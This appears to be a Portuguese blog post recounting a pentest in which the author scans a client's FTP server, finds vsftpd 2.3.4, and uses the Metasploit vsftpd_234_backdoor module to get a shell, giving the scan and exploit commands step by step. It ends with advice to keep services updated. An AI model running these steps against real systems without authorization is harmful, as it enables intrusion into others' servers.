quarta-feira, 30 de janeiro de 2013

Explorando Vulnerabilidade VSFTPD. Deu Mole Dançou!!!


Senhores,

           Hoje vou falar de uma vulnerabilidade, que já não é tão nova, na verdade é ate antiga rsrs, o caso que vou contar servirá de lição para alguns admins.  Trata-se do VSFTPD, um dos aplicativos para FTP servers mais instalados e utilizados por administradores Linux em todo o mundo, só perde para o proftpd. A versão em questão é a vsftpd-2.3.4 de 2011-06-30, pelo que me lembro à vulnerabilidade começou a ser notificada logo no mês seguinte; mas acontece, que alguns sysadmins ou equipes de TI, sei la na conta de quem fica isso, acabam ignorando aquela linda regrinha de manter os serviços atualizados, e acreditem, isso acontece muito, recentemente fiz um trabalho em uma determinada empresa que o serviço de email estava nada menos do que 4 versões atrasadas. Vamos ao caso.

            Há um tempo recebi a ligação de uma amigo que assumiu a gestão de uma empresa de médio porte, e ele, preocupado, tinha certos receios com relação à segurança de seus dados; e após uma conversa, resolveu me contratar para fazer um pentest, dentre outras coisas. Iniciei minhas atividades realizando uma varredura por um dos ips reais pertencentes à empresa.

Sintaxe:
namp  -sS  -sV -p  21 ip_do_cliente

Resultado:
PORT    STATE  SERVICE   VERSION
21/tcp   open     ftp           vsftpd   2.3.4

Senhores, quando me deparei com a versão pensei comigo, comecei bem rsrs; não me recordava qual era a versão do vsftpd vulnerável, por isso contei com uma ajudinha do meu grande amigo Google  rsrs, após a confirmação da versão vulnerável parti para o Metasploit:

Sintaxe:
Search vsftpd

Resultado:
exploit/unix/ftp/vsftpd_234_backdoor

Encontrado o exploit, segue abaixo sintaxe para utilização do mesmo:


set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname –a

             Após este rápido ataque, pude obter acesso ao shell da maquina e executar uma infinidade de comandos, e através desta maquina pude explorar outros servidores em uma infinidade de opções. Conclusão, a dica não e tão nova, mas para quem não conhecia ta valendo e sem contar que fica como alerta para o pessoal de TI das empresas, fiquem atento senhores você pode não ser um especialista em segurança, mas manter seus serviços atualizados é básico. Lembrando que na próxima coloco um prints legais e vai de uma forma mais didática o tempo tava curto e não queria deixar passar essa rsrs ate a próxima.
Postado por às
Marcadores:

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)